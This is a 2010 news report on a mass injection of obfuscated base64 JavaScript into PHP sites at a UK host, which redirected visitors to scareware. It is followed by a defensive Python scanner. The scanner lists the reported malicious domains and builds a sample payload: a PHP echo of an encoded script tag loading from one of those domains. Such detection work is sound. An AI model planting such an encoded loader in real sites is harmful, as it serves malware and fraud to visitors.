Oct 5, 2010 09:11 GMT

A new mass injection attack infected a significant number of websites hosted at 123-reg.co.uk, one of the largest domain providers in the UK, with code directing visitors to scareware.

The attack was discovered by Sucuri Security, a company providing Web integrity monitoring solutions and operating a website malware scanner.

Affected websites have obfuscated, base64-encoded JavaScript code added to all of their PHP files.

The code is actually a script element which loads malicious content from external domains including meqashopperinfo.com, meqashoppercom.com, meqashopperonline.com and www4.in-scale-feed.in.

The attack redirects visitors of the infected websites to a scareware page, which mimics an antivirus scan and displays bogus alerts about malware infections on their computers.

The purpose of the scam is to trick users into downloading and installing a rogue AV program, which further bombards their desktop with fake security warnings in an attempt to convince them to buy a license.

People who end up doing so will not only pay a steep price for a useless application, but they will also compromise their credit card details in the process.

"What’s interesting is that the domain is registered by the same people responsible for the previous attacks at Godaddy, Bluehost, etc: Hillary Kneber," writes David Dede, a researcher at Sucuri.

Hillary Kneber is a well-known fake identity used by cybercriminals to register domain names that are later used in malicious activities.

Other big hosting providers like Go Daddy, Network Solutions, Bluehost or RackSpace have been attacked in the past in similar ways, some of them even repeatedly.

This has forced them to take various precautions, educate their users and create automated cleaning systems.

It's worth noting that attacks targeting a particular hosting company don't necessarily point to a vulnerability in its infrastructure.

This usually happens because attackers use automated tools to scan entire blocks of IP addresses for vulnerable sites and then inject them all at once.

If your website is affected, you should check out Sucuri's free clean-up script. Even though it has WordPress in the name, it should work for any PHP-based site.
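To check a site for the injection described above, the following Python scanner decodes base64 runs found in PHP files and reports any script element they load from an external host. It is an added example, not Sucuri's clean-up script or code from the article; the 40-character run threshold, the function names and the sample wrapper are assumptions, and only the four domains come from the report.

```python
import base64
import binascii
import re
from pathlib import Path

# Domains named in the article as sources of the injected script.
REPORTED_DOMAINS = {"meqashopperinfo.com", "meqashoppercom.com",
                    "meqashopperonline.com", "www4.in-scale-feed.in"}

# Assumption: the payload sits in the file as one base64 run of 40+ characters.
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")
SCRIPT_SRC = re.compile(
    rb"<script[^>]*\bsrc\s*=\s*[\"']?(?:https?:)?//([^/\"'\s>]+)", re.I)

# Constructed sample; the article does not show the injected code itself.
SAMPLE = b'<?php echo base64_decode("' + base64.b64encode(
    b'<script src="http://meqashopperinfo.com/x.js"></script>') + b'"); ?>'


def decoded_blobs(data: bytes):
    """Yield the decoded form of every base64 run that decodes cleanly."""
    for match in B64_RUN.finditer(data):
        run = match.group(0).rstrip(b"=")
        run += b"=" * (-len(run) % 4)  # restore padding to a multiple of 4
        try:
            yield base64.b64decode(run, validate=True)
        except (binascii.Error, ValueError):
            continue  # long identifier or hash, not valid base64


def scan_bytes(data: bytes):
    """Return sorted hosts loaded by <script src=...> inside decoded blobs."""
    hosts = set()
    for blob in decoded_blobs(data):
        for host in SCRIPT_SRC.findall(blob):
            hosts.add(host.decode("ascii", "replace").lower())
    return sorted(hosts)


def scan_tree(root):
    """Map each .php file under root to (host, is_reported_domain) findings."""
    findings = {}
    for path in Path(root).rglob("*.php"):
        hosts = scan_bytes(path.read_bytes())
        if hosts:
            findings[str(path)] = [(h, h in REPORTED_DOMAINS) for h in hosts]
    return findings
```

Hosts outside the reported list are still returned, flagged `False`, since an encoded script element in a PHP file deserves a manual look whatever it points at.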